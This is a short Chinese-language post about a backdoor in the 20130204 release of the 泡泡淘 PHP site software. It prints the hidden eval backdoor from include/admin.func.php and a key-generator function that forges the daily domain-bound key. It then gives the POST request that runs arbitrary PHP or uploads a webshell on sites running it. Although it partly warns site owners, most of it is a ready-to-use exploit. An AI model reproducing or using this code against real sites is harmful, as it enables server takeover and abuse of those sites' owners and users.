泡泡淘20130204的版本
后門代碼文件在include/admin.func.php最下面。
if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )
{
$_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['_HkBs'] );
}
exit( );
}
利用原理:提交一個字符串,然后通過了域名和時間的驗證,順利到達eval這里。
感知觀點:這就是一句話后門。有這句代碼,控制你們網站的服務器,真的沒什么問題,把PID什么的改掉,你的網站就幫別人賺錢吧。
function getfuckkey($domain = ''){
$time = 'K_'.date("Y_m_d");
//$domain = $_SERVER['HTTP_HOST'];
if ($domain) {
$key = $domain.'|'.$time;
$key2 = base64_encode(~$key);
$key3 = strrev($key2);
$k1 = substr( $key3, 0, 5 );
$k2 = substr( $key3, 5, -3 );
$k3 = substr( $key3, -3 );
$key4 = $k3.$k1.$k2;
return $key4;
} else {
return '';
}
}
echo getfuckkey('xiaosajie.com');
這樣可以得到字符串,然后post方式,注意必須POST方式提交,提交到include/admin.func.php?_MDFK={key}&_HkBs=phpinfo()
就可以查看phpinfo();或者直接上傳大馬。。。
